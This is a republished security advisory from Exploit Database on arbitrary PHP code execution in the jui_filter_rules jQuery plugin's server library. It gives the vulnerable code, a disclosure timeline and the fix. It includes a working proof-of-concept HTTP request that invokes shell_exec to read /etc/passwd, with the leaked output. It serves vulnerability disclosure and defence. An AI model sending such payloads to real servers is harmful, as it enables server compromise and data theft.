jQuery – jui_filter_rules PHP Code Execution

• Exploit Database
• 37 阅读

• 作者： Timo Schmid
  日期： 2015-02-19
• 类别：

  • remote
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/36124/

• -----BEGIN PGP SIGNED MESSAGE-----
  Hash: RIPEMD160
  
  PHP Code Execution in jui_filter_rules Parsing Library
  ======================================================
  Researcher: Timo Schmid <tschmid@ernw.de>
  
  
  Description
  ===========
  jui_filter_rules[1] is a jQuery plugin which allows users to generate a
  ruleset
  which could be used to filter datasets inside a web application.
  
  The plugin also provides a PHP library to turn the user submitted
  ruleset into
  SQL where statements for server side filtering.
  This PHP library contains a feature which allows to convert the
  submitted filter
  values with server side functions. These functions can be specified
  within the
  ruleset, which leads to an arbitrary PHP code execution.
  
  
  Exploitation Technique
  ======================
  Remote
  
  
  Severity Level
  ==============
  Critical
  
  
  CVSS Base Score
  ===============
  6.8 (AV:N / AC:M / Au:N / C:P / I:P / A:P)
  
  
  CVE-ID
  ======
  <unassigned>
  
  
  Impact
  ======
  By using the provided rule parsing library to generate SQL statements, an
  attacker is capable of executing arbitrary PHP code in the context of the
  web server. This could lead to a full compromise of the web server. The
  attack vector could be limited by existing validation mechanisms around the
  library, but this would require a partial manual parsing of the user
  supplied
  rules.
  
  
  Status
  ======
  Reported
  
  
  Vulnerable Code Section
  =======================
  server_side/php/jui_filter_rules.php:
  [...]
  private function create_filter_value_sql($filter_type, $operator_type, ...
  [...]
  if(is_array($filter_value_conversion_server_side)) {
  $function_name =
  $filter_value_conversion_server_side['function_name'];
  $args = $filter_value_conversion_server_side['args'];
  $arg_len = count($args);
  for($i = 0; $i < $vlen; $i++) {
  // create arguments values for this filter value
  $conversion_args = array();
  for($a = 0; $a < $arg_len; $a++) {
  if(array_key_exists('filter_value', $args[$a])) {
  array_push($conversion_args, $a_values[$i]);
  }
  if(array_key_exists('value', $args[$a])) {
  array_push($conversion_args, $args[$a]['value']);
  }
  }
  // execute user function and assign return value to filter value
  try {
  $a_values[$i] = call_user_func_array($function_name,
  $conversion_args);
  } catch(Exception $e) {
  $this->last_error = array(
  'element_rule_id' => $element_rule_id,
  'error_message' => $e->getMessage()
  );
  break;
  }
  }
  }
  [...]
  
  The provided PHP parsing library allows to specify a PHP function to convert
  the supplied filter value on the server side. This leads ultimatively to
  code
  execution through attacker supplied input. As no whitelist approach is used,
  any existing PHP function could be executed (including shell commands).
  
  
  Proof of Concept
  ================
  Using the demo application from the git repository:
  
  Executing shell_exec('cat /etc/passwd')
  
  Request:
  POST /ajax_create_sql.dist.php HTTP/1.0
  host: http://www.example.com
  X-Requested-With: XMLHttpRequest
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 471
  
  a_rules%5B0%5D%5Bfilter_value_conversion_server_side%5D%5Bfunction_name%5D=she
  ll_exec&a_rules%5B0%5D%5Bcondition%5D%5BfilterValue%5D=&a_rules%5B0%5D%5Bfilte
  r_value_conversion_server_side%5D%5Bargs%5D%5B0%5D%5Bvalue%5D=cat+%2Fetc%2Fpas
  swd&pst_placeholder=question_mark&a_rules%5B0%5D%5Belement_rule_id%5D=foo&use_
  ps=yes&a_rules%5B0%5D%5Bcondition%5D%5Bfield%5D=some_field&a_rules%5B0%5D%5Bco
  ndition%5D%5Boperator%5D=equal&a_rules%5B0%5D%5Bcondition%5D%5BfilterType%5D=d
  ate
  
  Response:
  HTTP/1.1 200 OK
  Date: Tue, 13 Jan 2015 02:12:33 GMT
  Server: Apache/2.2.22 (Debian)
  Content-Length: 530
  Content-Type: text/html
  
  {"sql":"WHERE \nsome_field = ?","bind_params":"root:x:0:0:admin
  COSMOS:/root:/
  bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\nbin:x:2:2:bin:/bin:/bin/sh\ns
  ys:x:3:3:sys:/dev:/bin/sh\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:ga
  mes:/usr/games:/bin/sh\nman:x:6:12:man:/var/cache/man:/bin/sh\nlp:x:7:7:lp:/va
  r/spool/lpd:/bin/sh\nmail:x:8:8:mail:/var/mail:/bin/sh\nnews:x:9:9:news:/var/s
  pool/news:/bin/sh\nuucp:x:10:10:uucp:/var/spool/uucp:/bin/sh\nproxy:x:13:13:pr
  oxy:/bin:/bin/sh\nwww-data:x:33:33:www-data:/var/www:/bin/sh"}
  
  
  
  Solution
  ========
  This functionality should generally be removed or replaced by a mapping/
  whitelist approach and strict type filtering to prevent arbitrary code
  execution.
  
  
  Affected Versions
  =================
  >= git commit b1e795eeba1bac2f9b0d383cd3da24d6d26ccb4b
  < 1.0.6 (commit 0b61463cd02cc1814046b516242779b29ba7d1e1)
  
  
  Timeline
  ========
  2015-01-12: Vulnerability found
  2015-01-13: Developer informed
  2015-02-14: Fixed in version 1.0.6 (git
  0b61463cd02cc1814046b516242779b29ba7d1e1)
  
  
  References
  ==========
  [1] http://www.pontikis.net/labs/jui_filter_rules
  [2] https://www.owasp.org/index.php/Code_Injection
  [3] https://www.ernw.de/download/BC-1501.txt
  [4] https://bufferoverflow.eu/BC-1501.txt
  
  
  Advisory-ID
  ===========
  BC-1501
  
  
  Disclaimer
  ==========
  The information herein contained may change without notice. Use of this
  information constitutes acceptance for use in an AS IS condition. There
  are NO
  warranties, implied or otherwise, with regard to this information or its
  use.
  Any use of this information is at the user's risk. In no event shall the
  author/
  distributor be held liable for any damages whatsoever arising out of or in
  connection with the use or spread of this information.
  
  - -- 
  Timo Schmid
  
  ERNW GmbH, Carl-Bosch-Str. 4, 69115 Heidelberg-www.ernw.de
  Tel. +49 6221 48039-0 (HQ) - Fax +49 6221 419008 - Cell +49 151 16227192
  PGP-FP 971B D4F7 5DD1 FCED 11FC 2C61 7AB6 927D 6F26 6CE0
  
  Handelsregister Mannheim: HRB 337135
  Geschaeftsfuehrer: Enno Rey
  
  ==============================================================
  || Blog: www.insinuator.net | | Conference: www.troopers.de ||
  ==============================================================
  ================== TROOPERS15 ==================
  * International IT Security Conference & Workshops
  * 16th - 20st March 2015 / Heidelberg, Germany
  * www.troopers.de
  ====================================================
  -----BEGIN PGP SIGNATURE-----
  Version: GnuPG v2
  
  iQEcBAEBAwAGBQJU5KMNAAoJEHq2kn1vJmzgroMIAIsvJOdkZLSIjp1bdczg7NFP
  YBcVZNXXd7H2LES/bH20wGHMEke2YfL97CfjBk5R1OpBaialTHHi/HrzqbnWft2x
  x+u7rOdG0Q+aAAakoBpO7wG1B97+bmXnR6ytgFtxgJO+dfWWwAxhjsqjQ0boRgMr
  bzhFkHznlUV2s89n6vEBG2qnowSNqJgnWpbkyekCyISF87bh4nfuNDoj40+aCCNa
  Iw3AO8S2bvgVqY980hovoCsW94764/65mVMr2dvTlQx3tR1zTra2km8yq0IOtdIs
  AJ8dicIAN0EDuGQKFtLbxkShh4E9spXeQlFRmz1kLa76PELHzJWnyhKUB4o+uds=
  =tnwW
  -----END PGP SIGNATURE-----